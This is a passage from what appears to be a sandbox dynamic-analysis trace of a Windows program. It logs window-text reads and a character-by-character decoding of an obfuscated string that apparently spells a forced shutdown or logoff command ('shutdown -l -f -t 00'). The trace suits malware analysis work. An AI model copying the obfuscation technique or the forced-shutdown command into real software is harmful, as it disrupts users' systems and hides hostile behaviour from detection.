(HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0166.356] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0166.356] GetFocus () returned 0x0 [0166.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0166.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0x1159724, cchWideChar=5 | out: lpWideCharStr="Acti") returned 5 [0166.356] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0166.356] VarCmp (pvarLeft=0x28f990, pvarRight=0x28f9f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0166.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.358] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0166.358] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.363] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0166.364] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.364] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.365] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.365] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.365] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.366] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.367] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.367] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0166.367] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.368] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0166.369] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.369] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.370] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.370] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0166.371] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.371] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.372] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.372] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0166.373] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.374] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.374] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.387] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.387] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.388] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.388] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.389] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0166.394] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.395] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.395] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.396] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.396] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.397] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0166.398] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.398] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.399] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.399] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.400] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.400] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.401] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.402] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.402] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.403] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.403] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.404] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.404] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.404] GetForegroundWindow () returned 0x102c2 [0166.404] GetLastError () returned 0x0 [0166.405] SysStringLen (param_1=" ") returned 0xff [0166.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0166.405] SysStringLen (param_1=" ") returned 0xff [0166.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0166.461] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0166.462] GetLastError () returned 0x0 [0166.462] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0166.462] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0166.462] SysStringLen (param_1="Acti") returned 0x4 [0166.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Acti", cchWideChar=5, lpMultiByteStr=0x11596fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acti", lpUsedDefaultChar=0x0) returned 5 [0166.463] SetWindowTextA (hWnd=0x103c4, lpString="Acti") returned 1 [0166.463] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0166.463] GetFocus () returned 0x0 [0166.463] lstrlenA (lpString="Acti") returned 4 [0166.463] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0166.463] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Acti") returned 4 [0166.463] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0166.463] GetFocus () returned 0x0 [0166.464] lstrcmpA (lpString1="Acti", lpString2="Acti") returned 0 [0166.464] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0166.464] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0166.464] GetFocus () returned 0x0 [0166.464] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0166.464] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0166.464] GetFocus () returned 0x0 [0166.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0166.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0x11596fc, cchWideChar=5 | out: lpWideCharStr="Acti") returned 5 [0166.465] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0166.465] VarCmp (pvarLeft=0x28f990, pvarRight=0x28f9f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0166.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.466] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0166.466] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.467] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0166.467] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.489] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0166.489] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.490] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.490] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.491] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0166.491] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.492] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: 